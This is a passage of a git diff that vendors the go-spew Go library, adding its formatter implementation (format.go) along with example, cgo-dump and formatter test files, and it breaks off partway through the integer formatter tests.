+	v3s := "(len=" + v3Len + " cap=" + v3Cap + ") " +
+		"{\n 00000000  74 65 73 74 33 00                               " +
+		"  |test3.|\n}"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n", "("+v3t2+") "+v3s+"\n")
+
+	// C signed char array.
+	v4, v4l, v4c := testdata.GetCgoSignedCharArray()
+	v4Len := fmt.Sprintf("%d", v4l)
+	v4Cap := fmt.Sprintf("%d", v4c)
+	v4t := "[6]testdata._Ctype_schar"
+	v4t2 := "testdata._Ctype_schar"
+	v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+		"{\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 101,\n (" + v4t2 +
+		") 115,\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 52,\n (" + v4t2 +
+		") 0\n}"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+
+	// C uint8_t array.
+	v5, v5l, v5c := testdata.GetCgoUint8tArray()
+	v5Len := fmt.Sprintf("%d", v5l)
+	v5Cap := fmt.Sprintf("%d", v5c)
+	v5t := "[6]testdata._Ctype_uint8_t"
+	v5s := "(len=" + v5Len + " cap=" + v5Cap + ") " +
+		"{\n 00000000  74 65 73 74 35 00                               " +
+		"  |test5.|\n}"
+	addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+
+	// C typedefed unsigned char array.
+	v6, v6l, v6c := testdata.GetCgoTypdefedUnsignedCharArray()
+	v6Len := fmt.Sprintf("%d", v6l)
+	v6Cap := fmt.Sprintf("%d", v6c)
+	v6t := "[6]testdata._Ctype_custom_uchar_t"
+	v6s := "(len=" + v6Len + " cap=" + v6Cap + ") " +
+		"{\n 00000000  74 65 73 74 36 00                               " +
+		"  |test6.|\n}"
+	addDumpTest(v6, "("+v6t+") "+v6s+"\n")
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
new file mode 100644
index 0000000000..52a0971fb3
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
@@ -0,0 +1,26 @@
+// Copyright (c) 2013 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when either cgo is not supported or "-tags testcgo" is not added to the go
+// test command line.  This file intentionally does not setup any cgo tests in
+// this scenario.
+// +build !cgo !testcgo
+
+package spew_test
+
+func addCgoDumpTests() {
+	// Don't add any tests for cgo since this file is only compiled when
+	// there should not be any cgo tests.
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/example_test.go b/vendor/github.com/davecgh/go-spew/spew/example_test.go
new file mode 100644
index 0000000000..c6ec8c6d59
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/example_test.go
@@ -0,0 +1,226 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+	"fmt"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+type Flag int
+
+const (
+	flagOne Flag = iota
+	flagTwo
+)
+
+var flagStrings = map[Flag]string{
+	flagOne: "flagOne",
+	flagTwo: "flagTwo",
+}
+
+func (f Flag) String() string {
+	if s, ok := flagStrings[f]; ok {
+		return s
+	}
+	return fmt.Sprintf("Unknown flag (%d)", int(f))
+}
+
+type Bar struct {
+	data uintptr
+}
+
+type Foo struct {
+	unexportedField Bar
+	ExportedField   map[interface{}]interface{}
+}
+
+// This example demonstrates how to use Dump to dump variables to stdout.
+func ExampleDump() {
+	// The following package level declarations are assumed for this example:
+	/*
+		type Flag int
+
+		const (
+			flagOne Flag = iota
+			flagTwo
+		)
+
+		var flagStrings = map[Flag]string{
+			flagOne: "flagOne",
+			flagTwo: "flagTwo",
+		}
+
+		func (f Flag) String() string {
+			if s, ok := flagStrings[f]; ok {
+				return s
+			}
+			return fmt.Sprintf("Unknown flag (%d)", int(f))
+		}
+
+		type Bar struct {
+			data uintptr
+		}
+
+		type Foo struct {
+			unexportedField Bar
+			ExportedField   map[interface{}]interface{}
+		}
+	*/
+
+	// Setup some sample data structures for the example.
+	bar := Bar{uintptr(0)}
+	s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+	f := Flag(5)
+	b := []byte{
+		0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+		0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+		0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+		0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+		0x31, 0x32,
+	}
+
+	// Dump!
+	spew.Dump(s1, f, b)
+
+	// Output:
+	// (spew_test.Foo) {
+	//  unexportedField: (spew_test.Bar) {
+	//   data: (uintptr) <nil>
+	//  },
+	//  ExportedField: (map[interface {}]interface {}) (len=1) {
+	//   (string) (len=3) "one": (bool) true
+	//  }
+	// }
+	// (spew_test.Flag) Unknown flag (5)
+	// ([]uint8) (len=34 cap=34) {
+	//  00000000  11 12 13 14 15 16 17 18  19 1a 1b 1c 1d 1e 1f 20  |............... |
+	//  00000010  21 22 23 24 25 26 27 28  29 2a 2b 2c 2d 2e 2f 30  |!"#$%&'()*+,-./0|
+	//  00000020  31 32                                             |12|
+	// }
+	//
+}
+
+// This example demonstrates how to use Printf to display a variable with a
+// format string and inline formatting.
+func ExamplePrintf() {
+	// Create a double pointer to a uint 8.
+	ui8 := uint8(5)
+	pui8 := &ui8
+	ppui8 := &pui8
+
+	// Create a circular data type.
+	type circular struct {
+		ui8 uint8
+		c   *circular
+	}
+	c := circular{ui8: 1}
+	c.c = &c
+
+	// Print!
+	spew.Printf("ppui8: %v\n", ppui8)
+	spew.Printf("circular: %v\n", c)
+
+	// Output:
+	// ppui8: <**>5
+	// circular: {1 <*>{1 <*><shown>}}
+}
+
+// This example demonstrates how to use a ConfigState.
+func ExampleConfigState() {
+	// Modify the indent level of the ConfigState only.  The global
+	// configuration is not modified.
+	scs := spew.ConfigState{Indent: "\t"}
+
+	// Output using the ConfigState instance.
+	v := map[string]int{"one": 1}
+	scs.Printf("v: %v\n", v)
+	scs.Dump(v)
+
+	// Output:
+	// v: map[one:1]
+	// (map[string]int) (len=1) {
+	// 	(string) (len=3) "one": (int) 1
+	// }
+}
+
+// This example demonstrates how to use ConfigState.Dump to dump variables to
+// stdout
+func ExampleConfigState_Dump() {
+	// See the top-level Dump example for details on the types used in this
+	// example.
+
+	// Create two ConfigState instances with different indentation.
+	scs := spew.ConfigState{Indent: "\t"}
+	scs2 := spew.ConfigState{Indent: " "}
+
+	// Setup some sample data structures for the example.
+	bar := Bar{uintptr(0)}
+	s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+
+	// Dump using the ConfigState instances.
+	scs.Dump(s1)
+	scs2.Dump(s1)
+
+	// Output:
+	// (spew_test.Foo) {
+	// 	unexportedField: (spew_test.Bar) {
+	// 		data: (uintptr) <nil>
+	// 	},
+	// 	ExportedField: (map[interface {}]interface {}) (len=1) {
+	//		(string) (len=3) "one": (bool) true
+	// 	}
+	// }
+	// (spew_test.Foo) {
+	//  unexportedField: (spew_test.Bar) {
+	//   data: (uintptr) <nil>
+	//  },
+	//  ExportedField: (map[interface {}]interface {}) (len=1) {
+	//   (string) (len=3) "one": (bool) true
+	//  }
+	// }
+	//
+}
+
+// This example demonstrates how to use ConfigState.Printf to display a variable
+// with a format string and inline formatting.
+func ExampleConfigState_Printf() {
+	// See the top-level Dump example for details on the types used in this
+	// example.
+
+	// Create two ConfigState instances and modify the method handling of the
+	// first ConfigState only.
+	scs := spew.NewDefaultConfig()
+	scs2 := spew.NewDefaultConfig()
+	scs.DisableMethods = true
+
+	// Alternatively
+	// scs := spew.ConfigState{Indent: " ", DisableMethods: true}
+	// scs2 := spew.ConfigState{Indent: " "}
+
+	// This is of type Flag which implements a Stringer and has raw value 1.
+	f := flagTwo
+
+	// Dump using the ConfigState instances.
+	scs.Printf("f: %v\n", f)
+	scs2.Printf("f: %v\n", f)
+
+	// Output:
+	// f: 1
+	// f: flagTwo
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format.go b/vendor/github.com/davecgh/go-spew/spew/format.go
new file mode 100644
index 0000000000..c49875bacb
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format.go
@@ -0,0 +1,419 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+	"bytes"
+	"fmt"
+	"reflect"
+	"strconv"
+	"strings"
+)
+
+// supportedFlags is a list of all the character flags supported by fmt package.
+const supportedFlags = "0-+# "
+
+// formatState implements the fmt.Formatter interface and contains information
+// about the state of a formatting operation.  The NewFormatter function can
+// be used to get a new Formatter which can be used directly as arguments
+// in standard fmt package printing calls.
+type formatState struct {
+	value          interface{}
+	fs             fmt.State
+	depth          int
+	pointers       map[uintptr]int
+	ignoreNextType bool
+	cs             *ConfigState
+}
+
+// buildDefaultFormat recreates the original format string without precision
+// and width information to pass in to fmt.Sprintf in the case of an
+// unrecognized type.  Unless new types are added to the language, this
+// function won't ever be called.
+func (f *formatState) buildDefaultFormat() (format string) {
+	buf := bytes.NewBuffer(percentBytes)
+
+	for _, flag := range supportedFlags {
+		if f.fs.Flag(int(flag)) {
+			buf.WriteRune(flag)
+		}
+	}
+
+	buf.WriteRune('v')
+
+	format = buf.String()
+	return format
+}
+
+// constructOrigFormat recreates the original format string including precision
+// and width information to pass along to the standard fmt package.  This allows
+// automatic deferral of all format strings this package doesn't support.
+func (f *formatState) constructOrigFormat(verb rune) (format string) {
+	buf := bytes.NewBuffer(percentBytes)
+
+	for _, flag := range supportedFlags {
+		if f.fs.Flag(int(flag)) {
+			buf.WriteRune(flag)
+		}
+	}
+
+	if width, ok := f.fs.Width(); ok {
+		buf.WriteString(strconv.Itoa(width))
+	}
+
+	if precision, ok := f.fs.Precision(); ok {
+		buf.Write(precisionBytes)
+		buf.WriteString(strconv.Itoa(precision))
+	}
+
+	buf.WriteRune(verb)
+
+	format = buf.String()
+	return format
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible and
+// ensures that types for values which have been unpacked from an interface
+// are displayed when the show types flag is also set.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
+func (f *formatState) unpackValue(v reflect.Value) reflect.Value {
+	if v.Kind() == reflect.Interface {
+		f.ignoreNextType = false
+		if !v.IsNil() {
+			v = v.Elem()
+		}
+	}
+	return v
+}
+
+// formatPtr handles formatting of pointers by indirecting them as necessary.
+func (f *formatState) formatPtr(v reflect.Value) {
+	// Display nil if top level pointer is nil.
+	showTypes := f.fs.Flag('#')
+	if v.IsNil() && (!showTypes || f.ignoreNextType) {
+		f.fs.Write(nilAngleBytes)
+		return
+	}
+
+	// Remove pointers at or below the current depth from map used to detect
+	// circular refs.
+	for k, depth := range f.pointers {
+		if depth >= f.depth {
+			delete(f.pointers, k)
+		}
+	}
+
+	// Keep list of all dereferenced pointers to possibly show later.
+	pointerChain := make([]uintptr, 0)
+
+	// Figure out how many levels of indirection there are by derferencing
+	// pointers and unpacking interfaces down the chain while detecting circular
+	// references.
+	nilFound := false
+	cycleFound := false
+	indirects := 0
+	ve := v
+	for ve.Kind() == reflect.Ptr {
+		if ve.IsNil() {
+			nilFound = true
+			break
+		}
+		indirects++
+		addr := ve.Pointer()
+		pointerChain = append(pointerChain, addr)
+		if pd, ok := f.pointers[addr]; ok && pd < f.depth {
+			cycleFound = true
+			indirects--
+			break
+		}
+		f.pointers[addr] = f.depth
+
+		ve = ve.Elem()
+		if ve.Kind() == reflect.Interface {
+			if ve.IsNil() {
+				nilFound = true
+				break
+			}
+			ve = ve.Elem()
+		}
+	}
+
+	// Display type or indirection level depending on flags.
+	if showTypes && !f.ignoreNextType {
+		f.fs.Write(openParenBytes)
+		f.fs.Write(bytes.Repeat(asteriskBytes, indirects))
+		f.fs.Write([]byte(ve.Type().String()))
+		f.fs.Write(closeParenBytes)
+	} else {
+		if nilFound || cycleFound {
+			indirects += strings.Count(ve.Type().String(), "*")
+		}
+		f.fs.Write(openAngleBytes)
+		f.fs.Write([]byte(strings.Repeat("*", indirects)))
+		f.fs.Write(closeAngleBytes)
+	}
+
+	// Display pointer information depending on flags.
+	if f.fs.Flag('+') && (len(pointerChain) > 0) {
+		f.fs.Write(openParenBytes)
+		for i, addr := range pointerChain {
+			if i > 0 {
+				f.fs.Write(pointerChainBytes)
+			}
+			printHexPtr(f.fs, addr)
+		}
+		f.fs.Write(closeParenBytes)
+	}
+
+	// Display dereferenced value.
+	switch {
+	case nilFound == true:
+		f.fs.Write(nilAngleBytes)
+
+	case cycleFound == true:
+		f.fs.Write(circularShortBytes)
+
+	default:
+		f.ignoreNextType = true
+		f.format(ve)
+	}
+}
+
+// format is the main workhorse for providing the Formatter interface.  It
+// uses the passed reflect value to figure out what kind of object we are
+// dealing with and formats it appropriately.  It is a recursive function,
+// however circular data structures are detected and handled properly.
+func (f *formatState) format(v reflect.Value) {
+	// Handle invalid reflect values immediately.
+	kind := v.Kind()
+	if kind == reflect.Invalid {
+		f.fs.Write(invalidAngleBytes)
+		return
+	}
+
+	// Handle pointers specially.
+	if kind == reflect.Ptr {
+		f.formatPtr(v)
+		return
+	}
+
+	// Print type information unless already handled elsewhere.
+	if !f.ignoreNextType && f.fs.Flag('#') {
+		f.fs.Write(openParenBytes)
+		f.fs.Write([]byte(v.Type().String()))
+		f.fs.Write(closeParenBytes)
+	}
+	f.ignoreNextType = false
+
+	// Call Stringer/error interfaces if they exist and the handle methods
+	// flag is enabled.
+	if !f.cs.DisableMethods {
+		if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+			if handled := handleMethods(f.cs, f.fs, v); handled {
+				return
+			}
+		}
+	}
+
+	switch kind {
+	case reflect.Invalid:
+		// Do nothing.  We should never get here since invalid has already
+		// been handled above.
+
+	case reflect.Bool:
+		printBool(f.fs, v.Bool())
+
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		printInt(f.fs, v.Int(), 10)
+
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+		printUint(f.fs, v.Uint(), 10)
+
+	case reflect.Float32:
+		printFloat(f.fs, v.Float(), 32)
+
+	case reflect.Float64:
+		printFloat(f.fs, v.Float(), 64)
+
+	case reflect.Complex64:
+		printComplex(f.fs, v.Complex(), 32)
+
+	case reflect.Complex128:
+		printComplex(f.fs, v.Complex(), 64)
+
+	case reflect.Slice:
+		if v.IsNil() {
+			f.fs.Write(nilAngleBytes)
+			break
+		}
+		fallthrough
+
+	case reflect.Array:
+		f.fs.Write(openBracketBytes)
+		f.depth++
+		if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+			f.fs.Write(maxShortBytes)
+		} else {
+			numEntries := v.Len()
+			for i := 0; i < numEntries; i++ {
+				if i > 0 {
+					f.fs.Write(spaceBytes)
+				}
+				f.ignoreNextType = true
+				f.format(f.unpackValue(v.Index(i)))
+			}
+		}
+		f.depth--
+		f.fs.Write(closeBracketBytes)
+
+	case reflect.String:
+		f.fs.Write([]byte(v.String()))
+
+	case reflect.Interface:
+		// The only time we should get here is for nil interfaces due to
+		// unpackValue calls.
+		if v.IsNil() {
+			f.fs.Write(nilAngleBytes)
+		}
+
+	case reflect.Ptr:
+		// Do nothing.  We should never get here since pointers have already
+		// been handled above.
+
+	case reflect.Map:
+		// nil maps should be indicated as different than empty maps
+		if v.IsNil() {
+			f.fs.Write(nilAngleBytes)
+			break
+		}
+
+		f.fs.Write(openMapBytes)
+		f.depth++
+		if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+			f.fs.Write(maxShortBytes)
+		} else {
+			keys := v.MapKeys()
+			if f.cs.SortKeys {
+				sortValues(keys, f.cs)
+			}
+			for i, key := range keys {
+				if i > 0 {
+					f.fs.Write(spaceBytes)
+				}
+				f.ignoreNextType = true
+				f.format(f.unpackValue(key))
+				f.fs.Write(colonBytes)
+				f.ignoreNextType = true
+				f.format(f.unpackValue(v.MapIndex(key)))
+			}
+		}
+		f.depth--
+		f.fs.Write(closeMapBytes)
+
+	case reflect.Struct:
+		numFields := v.NumField()
+		f.fs.Write(openBraceBytes)
+		f.depth++
+		if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+			f.fs.Write(maxShortBytes)
+		} else {
+			vt := v.Type()
+			for i := 0; i < numFields; i++ {
+				if i > 0 {
+					f.fs.Write(spaceBytes)
+				}
+				vtf := vt.Field(i)
+				if f.fs.Flag('+') || f.fs.Flag('#') {
+					f.fs.Write([]byte(vtf.Name))
+					f.fs.Write(colonBytes)
+				}
+				f.format(f.unpackValue(v.Field(i)))
+			}
+		}
+		f.depth--
+		f.fs.Write(closeBraceBytes)
+
+	case reflect.Uintptr:
+		printHexPtr(f.fs, uintptr(v.Uint()))
+
+	case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+		printHexPtr(f.fs, v.Pointer())
+
+	// There were not any other types at the time this code was written, but
+	// fall back to letting the default fmt package handle it if any get added.
+	default:
+		format := f.buildDefaultFormat()
+		if v.CanInterface() {
+			fmt.Fprintf(f.fs, format, v.Interface())
+		} else {
+			fmt.Fprintf(f.fs, format, v.String())
+		}
+	}
+}
+
+// Format satisfies the fmt.Formatter interface. See NewFormatter for usage
+// details.
+func (f *formatState) Format(fs fmt.State, verb rune) {
+	f.fs = fs
+
+	// Use standard formatting for verbs that are not v.
+	if verb != 'v' {
+		format := f.constructOrigFormat(verb)
+		fmt.Fprintf(fs, format, f.value)
+		return
+	}
+
+	if f.value == nil {
+		if fs.Flag('#') {
+			fs.Write(interfaceBytes)
+		}
+		fs.Write(nilAngleBytes)
+		return
+	}
+
+	f.format(reflect.ValueOf(f.value))
+}
+
+// newFormatter is a helper function to consolidate the logic from the various
+// public methods which take varying config states.
+func newFormatter(cs *ConfigState, v interface{}) fmt.Formatter {
+	fs := &formatState{value: v, cs: cs}
+	fs.pointers = make(map[uintptr]int)
+	return fs
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface.  As a result, it integrates cleanly with standard fmt package
+printing functions.  The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations.  Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting.  In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly.  It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+Printf, Println, or Fprintf.
+*/
+func NewFormatter(v interface{}) fmt.Formatter {
+	return newFormatter(&Config, v)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format_test.go b/vendor/github.com/davecgh/go-spew/spew/format_test.go
new file mode 100644
index 0000000000..f9b93abe86
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format_test.go
@@ -0,0 +1,1558 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer and double pointer to the
+base test element are also tested to ensure proper indirection across all types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+  exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+- Type that has a custom Error interface
+- %x passthrough with uint
+- %#x passthrough with uint
+- %f passthrough with precision
+- %f passthrough with width and precision
+- %d passthrough with width
+- %q passthrough with string
+*/
+
+package spew_test
+
+import (
+	"bytes"
+	"fmt"
+	"testing"
+	"unsafe"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+// formatterTest is used to describe a test to be performed against NewFormatter.
+type formatterTest struct {
+	format string
+	in     interface{}
+	wants  []string
+}
+
+// formatterTests houses all of the tests to be performed against NewFormatter.
+var formatterTests = make([]formatterTest, 0)
+
+// addFormatterTest is a helper method to append the passed input and desired
+// result to formatterTests.
+func addFormatterTest(format string, in interface{}, wants ...string) {
+	test := formatterTest{format, in, wants}
+	formatterTests = append(formatterTests, test)
+}
+
+func addIntFormatterTests() {
+	// Max int8.
+	v := int8(127)
+	nv := (*int8)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "int8"
+	vs := "127"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Max int16.
+	v2 := int16(32767)
+	nv2 := (*int16)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "int16"
+	v2s := "32767"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Max int32.
+	v3 := int32(2147483647)
+	nv3 := (*int32)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "int32"
+	v3s := "2147483647"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+
+	// Max int64.
+	v4 := int64(9223372036854775807)
+	nv4 := (*int64)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "int64"
+	v4s := "9223372036854775807"
+	addFormatterTest("%v", v4, v4s)
+	addFormatterTest("%v", pv4, "<*>"+v4s)
+	addFormatterTest("%v", &pv4, "<**>"+v4s)
+	addFormatterTest("%v", nv4, "<nil>")
+	addFormatterTest("%+v", v4, v4s)
+	addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+	addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+	addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+	addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+	addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
